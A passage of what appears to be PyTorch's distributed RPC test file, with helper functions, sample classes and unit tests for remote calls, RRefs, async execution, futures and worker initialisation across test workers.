self.world_size = world_size
def get_worker_infos(self):
return {
rpc.WorkerInfo(name=worker_name(rank), id=rank)
for rank in range(self.world_size)
}
def _stub_construct_rpc_backend_options_handler(**kwargs):
return mock.Mock() # RpcBackendOptions.
def _stub_init_rpc_backend_handler(store, name, rank, world_size, rpc_backend_options):
return StubRpcAgent(world_size=world_size)
def set_value(value):
VALUE_FUTURE.set_result(value)
def wait_for_value_future():
return VALUE_FUTURE.result()
def set_and_check_done(value):
VALUE_FUTURE.set_result(value)
return DONE_FUTURE.result()
# The classes and functions below are used to test Python user-defined
# functions, classes, and methods over RPC.
TensorClass = namedtuple("TensorClass", ["tensors"])
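# Exercises the internal RPC pickler from within __getstate__/__setstate__, so
# (de)serializing an instance of this class itself runs a pickled Python UDF.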
class MyPickleClass:
def __init__(self):
self.t = None
def __getstate__(self):
(pickled_python_udf, tensors) = _internal_rpc_pickler.serialize(
PythonUDF(my_tensor_function, (torch.ones(2, 2), torch.ones(2, 2)), None)
)
return (pickled_python_udf, tensors)
def __setstate__(self, obj):
python_udf = _internal_rpc_pickler.deserialize(obj[0], obj[1])
result = python_udf.func(python_udf.args[0], python_udf.args[1])
self.t = result
def set(self, val):
self.t = val
class SlowPickleClass:
def __init__(self, t):
self.t = t
def __getstate__(self):
time.sleep(self.t)
return (self.t, )
def __setstate__(self, obj):
self.t = obj[0]
time.sleep(self.t)
class MyClass:
def __init__(self, a, delay=False):
self.a = a
# delay initialization to simulate errors if specified
if delay:
time.sleep(2)
def my_instance_method(self, b):
return self.a + b
@classmethod
def my_class_method(cls, d, e):
return d + e
@staticmethod
def my_static_method(f):
return f > 10
def increment_value(self, increment):
self.a += increment
def get_value(self):
return self.a
def my_slow_method(self, my_tensor_arg):
time.sleep(5)
return torch.add(self.a, my_tensor_arg)
def _call_method_on_rref(method, rref, *args, **kwargs):
return method(rref.local_value(), *args, **kwargs)
def get_rref_list(values):
return [RRef(MyClass(a)) for a in values]
def add_rref_to_value(rref, value):
return rref.to_here() + value
def run_nested_pickle(pickle_cls_instance, tensor):
return pickle_cls_instance.t + tensor
def build_sparse_tensor(coalesce=False):
i = [[0, 1, 1], [2, 0, 2]]
v = [3, 4, 5]
tensor = torch.sparse_coo_tensor(i, v, (2, 3))
if coalesce:
tensor = tensor.coalesce()
return tensor
def build_complex_tensors():
a = torch.ones(3, 3)
b = [a, a]
c = [b, b]
d = [a, b]
e = {a: d}
return [a, b, c, d, e]
def non_cont_test(t_view, t_cont):
if t_view.is_contiguous():
raise Exception('t_view is contiguous!')
if not t_cont.is_contiguous():
raise Exception('t_cont is not contiguous!')
if not torch.equal(t_view, t_cont):
raise Exception('t_view is not equal to t_cont!')
return t_view
def my_function(a, b, c):
return a + b + c
def my_tensor_function(a, b):
return a + b
def my_container_sum(a):
result = a[0]
for tensor in a[1:]:
result += tensor
return result
def my_sleep_func(seconds=1):
time.sleep(seconds)
return torch.mul(torch.tensor(1), torch.tensor(1))
def my_complex_tensor_function(list_input, tensor_class_input, dict_input):
res = list_input[0]
for t in list_input:
res += t
for k, v in dict_input.items():
res += v
complex_tensors = tensor_class_input.tensors
return (res, complex_tensors[0], complex_tensors[1], complex_tensors[2])
def my_rref_function(rref_a, rref_b):
return rref_a.to_here() + rref_b.to_here()
def delayed_add(a, b, seconds=0.05):
time.sleep(seconds)
return a + b
def no_result():
print("do nothing")
def raise_or_inc(value):
if value.numel() == 2:
raise ValueError("Expected error")
return value + 1
def nested_rpc(dst):
return rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
def nested_rpc_sparse(dst):
return rpc.rpc_sync(
dst,
torch.add,
args=(build_sparse_tensor(), build_sparse_tensor())
)
def multi_layer_nested_async_rpc(dst, world_size, ttl):
# this method returns immediately without blocking the callee, but will
# generate additional requests.
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
rpc.rpc_async(
current_dst,
multi_layer_nested_async_rpc,
args=(next_dst, world_size, ttl - 1),
)
return 0
def nested_rref(dst):
return (
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1)),
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 2)),
)
def nested_rref_sparse(dst):
return (
rpc.remote(
dst,
torch.add,
args=(build_sparse_tensor(), build_sparse_tensor())
),
rpc.remote(
dst,
torch.add,
args=(build_sparse_tensor(), build_sparse_tensor())
),
)
def nested_remote(dst):
rref = rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 3))
return rref.to_here()
def nested_remote_sparse(dst):
rref = rpc.remote(dst, torch.add, args=(build_sparse_tensor(), build_sparse_tensor()))
return rref.to_here()
def rref_forward_chain(dst, world_size, rref, ttl):
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
ret_rref = rpc.remote(
current_dst, rref_forward_chain, args=(next_dst, world_size, rref, ttl - 1)
)
return [ret_rref]
else:
return rref.to_here()
def rpc_return_rref(dst):
return rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1))
def light_rpc():
return 0
def heavy_rpc(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
def heavy_rpc_sparse(tensor):
for i in range(1, 100):
tensor *= i
tensor = tensor / (i + 1)
return 0
@torch.jit.script
def heavy_rpc_torchscript(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
@torch.jit.script
def my_script_func(tensor):
return torch.add(tensor, tensor)
expected_err = "Expected error"
def raise_func():
raise ValueError(expected_err)
@torch.jit.script
def raise_func_script(expected_err: str) -> torch.Tensor:
raise ValueError(expected_err)
expected_err_escape = "\nFirst line of error \n next line of error \n last line of error"
def raise_func_escape():
raise ValueError(expected_err_escape)
global_rref = None
def set_global_rref(rref):
global global_rref
global_rref = rref
def clear_global_rref():
global global_rref
global_rref = None
def check_rref_confirmed(rref):
return rref.confirmed_by_owner()
def get_rref_debug_info():
return _rref_context_get_debug_info()
def add_use_future_cb(to, x, y, z):
out = concurrent.futures.Future()
def callback(fut):
out.set_result(fut.wait() + z)
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(callback)
return out.result()
def get_events_from_profile(profile_rref):
return profile_rref.local_value().process_global_function_events
def add_use_future_set_result(to, x, y, z):
out = torch.futures.Future()
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(lambda fut : out.set_result(fut.wait() + z))
return out.wait()
def add_use_future_nested_cb(to, x, y, z):
out = torch.futures.Future()
def callback(fut1):
fut2 = rpc.rpc_async(to, torch.add, args=(fut1.wait(), z))
fut2.then(lambda fut2 : out.set_result(fut2.wait()))
fut1 = rpc.rpc_async(to, torch.add, args=(x, y))
fut1.then(callback)
return out.wait()
def fail_on_fut(fut):
pass
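# Functions decorated with @rpc.functions.async_execution are expected to
# return a Future; the RPC framework sends the Future's eventual value (not the
# Future object itself) back as the response. A few of the decorated functions
# below intentionally violate this to exercise error handling.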
@rpc.functions.async_execution
def async_raise_func():
raise RuntimeError("Expected error")
@rpc.functions.async_execution
def async_wrong_type():
return torch.zeros(2, 2)
@rpc.functions.async_execution
def async_add(to, x, y):
return rpc.rpc_async(to, torch.add, args=(x, y))
def slow_add(x, y, device="cpu"):
time.sleep(1)
x = x.to(device)
y = y.to(device)
return torch.add(x, y).cpu()
@rpc.functions.async_execution
def slow_async_add(to, x, y, device="cpu"):
return rpc.rpc_async(to, slow_add, args=(x, y, device))
@rpc.functions.async_execution
def async_add_with_future_ctor(to, x, y, z):
fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut1: fut.set_result(fut1.wait() + z)
)
return fut
@rpc.functions.async_execution
def async_add_chained(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_chained_multi(to, x, num, step):
fut = rpc.rpc_async(to, torch.add, args=(x, 0))
for _ in range(num):
fut = fut.then(lambda fut: fut.wait() + step)
return fut
@rpc.functions.async_execution
def async_add_nested(to, x, y, z):
return rpc.rpc_async(to, async_add, args=(to, x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_multi_fanout(to, x, num, step):
futs = []
for i in range(num):
if i == 0:
futs.append(rpc.rpc_async(to, torch.add, args=(x, step)))
else:
futs.append(rpc.rpc_async(to, torch.add, args=(0, step)))
# TODO: use torch.futures.collect_all
lock = Lock()
state = {"cnt": 0, "ret": torch.zeros_like(x)}
ret_future = torch.futures.Future()
def inc_and_set(fut):
with lock:
state["cnt"] += 1
state["ret"] += fut.wait()
if state["cnt"] >= len(futs):
ret_future.set_result(state["ret"])
for fut in futs:
fut.then(inc_and_set)
return ret_future
@rpc.functions.async_execution
def async_cuda_sleep_and_set_to_one(t):
device = t.device
original_stream = torch.cuda.current_stream(device)
new_stream = torch.cuda.Stream(device)
new_stream.wait_stream(original_stream)
with torch.cuda.stream(new_stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
t.fill_(1)
fut = Future(devices=[device])
fut.set_result(t)
return fut
@rpc.functions.async_execution
def async_cuda_nested_add(to, x, y, z):
def cb(fut):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
return fut.value() + z
return rpc.rpc_async(to, torch.add, args=(x, y)).then(cb)
# A custom Python class that contains a tensor, needed to see if we correctly
# use the Python pickler to extract tensors from non-IValue-convertible types.
class TensorWrapper:
__slots__ = ("tensor", "lock", "event")
def __init__(self, t):
self.tensor = t
# Add one non-picklable field, to ensure it's ignored/skipped.
self.lock = Lock()
self.event = torch.cuda.Event(enable_timing=True)
def increase(self, v):
with self.lock:
self.tensor += v
def sum(self):
with self.lock:
self.event.record()
return self.tensor.sum()
# Copied from test/test_cuda.py.
_cycles_per_ms = None
def get_cycles_per_ms():
"""Approximate number of cycles per millisecond for torch.cuda._sleep"""
global _cycles_per_ms
if _cycles_per_ms is None:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
_cycles_per_ms = 1000000 / start.elapsed_time(end)
return _cycles_per_ms
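# Usage sketch (mirroring the async CUDA helpers below): spinning the current
# CUDA stream for roughly 50 ms can be done with
#   torch.cuda._sleep(int(50 * get_cycles_per_ms()))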
class AsyncExecutionClass:
@staticmethod
@rpc.functions.async_execution
def static_async_add(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@classmethod
@rpc.functions.async_execution
def class_async_add(cls, to, x, y, z):
ret_fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: ret_fut.set_result(fut.wait() + z)
)
return ret_fut
@rpc.functions.async_execution
def bound_async_add(self, to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
def return_future():
return torch.futures.Future()
class FooBackendOptions(rpc.RpcBackendOptions):
def __init__(self, init_method):
# Must call the __init__ of the superclass (and do so directly,
# without using super()) because... pybind.
rpc.RpcBackendOptions.__init__(self)
self.init_method = init_method
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
class MyEmbeddingBagModel(torch.nn.Module):
def __init__(self, sparse):
super().__init__()
self.eb = torch.nn.EmbeddingBag(
10,
10,
sparse=sparse
)
def forward(self, x):
return self.eb(x)
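# A minimal parameter-server helper used by the tests: trainers report their
# gradient tensors for an iteration via `average`, and once `trainers` updates
# have arrived the averaged tensor is delivered to every pending future.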
class MyParameterServer:
def __init__(self, trainers):
self.lock = Lock()
self.trainers = trainers
self.iteration = 0
self.updates = 0
self.futures = []
self.total = None
self.gradient = None
@staticmethod
def get_gradient(rref):
return rref.local_value().gradient
@staticmethod
@rpc.functions.async_execution
def average(rref, riteration, tensor):
self = rref.local_value()
fut = torch.futures.Future()
with self.lock:
if riteration > self.iteration:
self.iteration = riteration
self.updates = 0
self.futures.clear()
self.futures.append(fut)
if self.total is None:
self.total = tensor
else:
self.total += tensor
self.updates += 1
if self.trainers == self.updates:
self.gradient = self.total / float(self.trainers)
for fut in self.futures:
result = self.total / float(self.trainers)
fut.set_result(result)
return fut
class RpcTest(RpcAgentTestFixture):
@dist_init
def test_worker_id(self):
n = self.rank + 1
peer_rank = n % self.world_size
self_worker_info = rpc.get_worker_info()
peer_worker_info = rpc.get_worker_info(worker_name(peer_rank))
self.assertEqual(self_worker_info.name, worker_name(self.rank))
self.assertEqual(peer_worker_info.name, worker_name(peer_rank))
with self.assertRaisesRegex(RuntimeError, "Unknown destination worker"):
unknown_worker_id = rpc.get_worker_info("WorkerUnknown")
@dist_init
def test_get_worker_infos(self):
worker_infos = rpc.api._get_current_rpc_agent().get_worker_infos()
worker_names = {worker_info.name for worker_info in worker_infos}
expected_worker_names = {
worker_name(rank) for rank in range(self.world_size)
}
self.assertEqual(worker_names, expected_worker_names)
worker_ids = {worker_info.id for worker_info in worker_infos}
expected_worker_ids = set(range(self.world_size))
self.assertEqual(worker_ids, expected_worker_ids)
@dist_init
def test_self_add(self):
self_worker_info = rpc.get_worker_info()
self_worker_name = worker_name(self.rank)
fut = rpc.rpc_async(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
ret = rpc.rpc_sync(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertEqual(ret, torch.ones(2, 2) + 1)
@dist_init
def test_send_to_rank(self):
dst_rank = (self.rank + 1) % self.world_size
# Test dense tensor
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test sparse tensor
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
x = build_sparse_tensor()
y = build_sparse_tensor()
expected_tensor = (x + y)
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(x, y))
self.assertEqual(expected_tensor, ret)
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
x = build_sparse_tensor(coalesce=True)
y = build_sparse_tensor(coalesce=True)
expected_tensor = (x + y)
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(x, y))
self.assertEqual(expected_tensor, ret)
# Test invalid ranks
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(self.world_size + 1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(-1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank + 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank - 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
def _self_py_udf_remote(self, worker_info, x, y, z):
rref = rpc.remote(worker_info, my_function, args=(x, y, z))
self.assertEqual(rref.to_here(), x + y + z)
@dist_init
def test_self_py_udf_remote(self):
self._self_py_udf_remote(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_py_udf_remote_sparse(self):
self._self_py_udf_remote(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
def _self_remote_rref_as_rpc_arg(self, dst, x, y, z):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(x, y, z))
fut = rpc.rpc_async(dst, add_rref_to_value, args=(rref, x))
ret = rpc.rpc_sync(dst, add_rref_to_value, args=(rref, x + y))
self.assertEqual(ret, x + y + z + x + y)
self.assertEqual(fut.wait(), x + y + z + x)
@dist_init
def test_self_remote_rref_as_rpc_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_rpc_arg(
dst,
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_rpc_arg_sparse(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_rpc_arg(
dst,
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_self_rpc_arg(self):
self._self_remote_rref_as_rpc_arg(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_self_rpc_arg_sparse(self):
self._self_remote_rref_as_rpc_arg(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
def _self_remote_rref_as_remote_arg(self, dst, x, y, z):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(x, y, z))
ret_rref = rpc.remote(dst, add_rref_to_value, args=(rref, x))
self.assertEqual(
ret_rref.to_here(), x + y + z + x
)
@dist_init
def test_self_remote_rref_as_remote_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_remote_arg(
dst,
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_remote_arg_sparse(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_remote_arg(
dst,
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_self_remote_arg(self):
self._self_remote_rref_as_remote_arg(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_self_remote_arg_sparse(self):
self._self_remote_rref_as_remote_arg(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_rref_proxy_non_exist(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
msg = "has no attribute \'non_exist\'"
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_sync().non_exist()
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_async().non_exist()
with self.assertRaisesRegex(AttributeError, msg):
rref.remote().non_exist()
def _test_rref_proxy_tensor(self, dst):
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
expected = torch.ones(2, 2) + 1 + 3
self.assertEqual(expected.size(), rref.rpc_sync().size())
self.assertEqual(expected + 1, rref.rpc_async().add(1).wait())
self.assertEqual(expected.view(1, 4), rref.remote().view(1, 4).to_here())
@dist_init
def test_rref_proxy_tensor(self):
self._test_rref_proxy_tensor(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_tensor_self(self):
self._test_rref_proxy_tensor(rpc.get_worker_info())
@dist_init
def test_rref_proxy_reuse(self):
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
my_function,
args=(torch.ones(2, 2), 1, 3)
)
expected = torch.ones(2, 2) + 1 + 3
proxy_rpc_sync = rref.rpc_sync()
proxy_rpc_async = rref.rpc_async()
proxy_remote = rref.remote()
self.assertEqual(expected.size(), proxy_rpc_sync.size())
self.assertEqual(expected + 1, proxy_rpc_sync.add(1))
self.assertEqual(expected.view(1, 4), proxy_rpc_sync.view(1, 4))
self.assertEqual(expected.size(), proxy_rpc_async.size().wait())
self.assertEqual(expected + 3, proxy_rpc_async.add(3).wait())
self.assertEqual(expected.view(4, 1), proxy_rpc_async.view(4, 1).wait())
self.assertEqual(expected.size(), proxy_remote.size().to_here())
self.assertEqual(expected + 5, proxy_remote.add(5).to_here())
self.assertEqual(expected.view(-1), proxy_remote.view(-1).to_here())
def _test_rref_proxy_class(self, dst):
rref = rpc.remote(dst, MyClass, args=(7,))
expected = MyClass(7)
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
expected.increment_value(3)
self.assertEqual(None, rref.rpc_sync().increment_value(1))
self.assertEqual(None, rref.rpc_async().increment_value(1).wait())
self.assertEqual(None, rref.remote().increment_value(1).to_here())
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
self.assertEqual(
expected.my_instance_method(2),
rref.rpc_sync().my_instance_method(2)
)
self.assertEqual(
expected.my_instance_method(3),
rref.rpc_async().my_instance_method(3).wait()
)
self.assertEqual(
expected.my_instance_method(4),
rref.remote().my_instance_method(4).to_here()
)
self.assertEqual(
expected.my_static_method(9),
rref.rpc_sync().my_static_method(9)
)
self.assertEqual(
expected.my_static_method(10),
rref.rpc_async().my_static_method(10).wait()
)
self.assertEqual(
expected.my_static_method(11),
rref.remote().my_static_method(11).to_here()
)
self.assertEqual(
expected.my_class_method(2, torch.zeros(2, 2)),
rref.rpc_sync().my_class_method(2, torch.zeros(2, 2))
)
self.assertEqual(
expected.my_class_method(2, torch.ones(3, 3)),
rref.rpc_async().my_class_method(2, torch.ones(3, 3)).wait()
)
self.assertEqual(
expected.my_class_method(2, torch.ones(4, 4)),
rref.remote().my_class_method(2, torch.ones(4, 4)).to_here()
)
@dist_init
def test_rref_proxy_class(self):
self._test_rref_proxy_class(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_class_self(self):
self._test_rref_proxy_class(rpc.get_worker_info())
@mock.patch.object(torch.distributed.autograd, "_init")
@mock.patch.object(torch.distributed.rpc.api, "_set_and_start_rpc_agent")
@dist_init(setup_rpc=False)
def test_register_rpc_backend_and_set_and_start_rpc_backend(
self, mock_rpc_agent, mock_dist_autograd_init
):
backend_name = "stub_backend"
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
with self.assertRaisesRegex(
RuntimeError, "^RPC backend .+: already registered$"
):
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
rpc.init_rpc(
name="worker1",
backend=backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
store, _, _ = next(
torch.distributed.rendezvous(
self.init_method, rank=self.rank, world_size=self.world_size
)
)
rpc._init_rpc_backend(
backend=self.rpc_backend,
store=store,
name="duplicate_name",
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name_2(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
rpc.init_rpc(
name=worker_name(self.rank % (self.world_size - 1)),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_reinit(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
# TODO: with TCP init, rank 0 raises Address already in use because
# rank 0 is the start daemon and the store is created before checking if
# RPC is already initialized in init_rpc.
if os.environ.get("RPC_INIT_WITH_TCP", None) == "1" and self.rank == 0:
expected_reinit_err = "Address already in use"
else:
expected_reinit_err = "is already initialized"
with self.assertRaisesRegex(RuntimeError, expected_reinit_err):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
def _world_size_one(self, a, b):
if self.rank == 0:
rpc.init_rpc(
name="me",
backend=self.rpc_backend,
rank=0,
world_size=1,
rpc_backend_options=self.rpc_backend_options,
)
def _rpc_sync(x, y):
expect = x * 2
result = rpc.rpc_sync(
"me",
my_tensor_function,
args=(x, y)
)
self.assertEqual(expect, result)
def _rpc_async(x, y):
expect = x * 2
result = rpc.rpc_async(
"me",
my_tensor_function,
args=(x, y)
).wait()
self.assertEqual(expect, result)
def _remote(x, y):
expect = x * 2
result = rpc.remote(
"me",
my_tensor_function,
args=(x, y)
).to_here()
self.assertEqual(expect, result)
_rpc_sync(a, b)
_rpc_async(a, b)
_remote(a, b)
rpc.shutdown()
def test_world_size_one(self):
self._world_size_one(
torch.ones(2, 2),
torch.ones(2, 2)
)
def test_world_size_one_sparse(self):
self._world_size_one(
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init(setup_rpc=False)
def test_invalid_names(self):
from torch.distributed.rpc import WorkerInfo
worker_id = 0
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo("abc*", worker_id)
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo(" ", worker_id)
with self.assertRaisesRegex(RuntimeError, "must be non-empty"):
info = WorkerInfo("", worker_id)
# If the number in the message does not match, it is likely that the
# value of MAX_NAME_LEN in RPC WorkerInfo has changed.
with self.assertRaisesRegex(RuntimeError, "shorter than 128"):
info = WorkerInfo("".join(["a" for i in range(500)]), worker_id)
@dist_init
def test_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@staticmethod
def return_callee_id():
return rpc.get_worker_info().id
@dist_init
def test_int_callee(self):
dst_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(dst_rank, RpcTest.return_callee_id)
self.assertEqual(ret, dst_rank)
@dist_init
def test_add_with_id(self):
n = self.rank + 1
dst_rank = n % self.world_size
        worker_info = rpc.get_worker_info(worker_name(dst_rank))
        ret = rpc.rpc_sync(
            worker_info, torch.add, args=(torch.ones(n, n), torch.ones(n, n))
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@dist_init
def test_scalar_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), n)
)
self.assertEqual(ret, (torch.ones(n, n) + n))
@dist_init
def test_async_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_nonzero(self):
n = self.rank + 1
dst_rank = n % self.world_size
x = torch.ones(self.world_size, self.world_size)
x[self.rank][self.rank] = 0
ret = rpc.rpc_sync(worker_name(dst_rank), torch.nonzero, args=(x,))
self.assertEqual(ret, x.nonzero())
def _multi_rpc(self, sparse):
dst_rank = (self.rank + 1) % self.world_size
for i in range(20):
n = i + self.rank + 1
if sparse:
x = build_sparse_tensor() * n
y = build_sparse_tensor() * n
else:
x = torch.ones(2, 2)
y = torch.ones(2, 2)
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(x, y),
)
self.assertEqual(ret, x * 2)
@dist_init
def test_multi_rpc(self):
self._multi_rpc(False)
@dist_init
def test_multi_rpc_sparse(self):
self._multi_rpc(True)
@dist_init
def test_future_wait_twice(self):
dst = worker_name((self.rank + 1) % self.world_size)
futs = []
for i in range(20):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
torch.futures.wait_all(futs)
for fut in futs:
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
def _run_uneven_workload(self, f, x, num_repeat=30):
# worker0 drives and waits for worker1 and worker2
# throughout the test.
if self.rank == 0:
self.assertTrue(self.world_size >= 3)
# Phase 1: Only worker1 has workload.
dst = "worker1"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, f, args=(x,))
futs.append(fut)
for fut in torch.futures.collect_all(futs).wait():
self.assertEqual(fut.wait(), 0)
# Phase 2: Only worker2 has workload.
# If join is not correctly implemented,
# worker2 should be closed by now.
dst = "worker2"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, f, args=(x,))
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
def _wait_all_workers(self, f, x):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload(f, x)
# worker0 calls this at the end after waiting for RPC responses.
        # worker1/2 call this immediately and still have some work after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
# Wait before proceeding to shutdown to ensure worker0 RPCs make
# it through to other workers.
dist.barrier()
rpc.shutdown(graceful=False)
@dist_init(setup_rpc=False)
def test_wait_all_workers_timeout(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
og_func = rpc.api._wait_all_workers
def wait_all_workers_sleep(timeout):
try:
rpc.api._all_gather(SlowPickleClass(0.5), timeout=timeout)
except RuntimeError as ex:
raise ex
rpc.api._wait_all_workers = wait_all_workers_sleep
try:
with self.assertRaisesRegex(RuntimeError, ''):
rpc.shutdown(graceful=True, timeout=0.01)
finally:
rpc.api._wait_all_workers = og_func
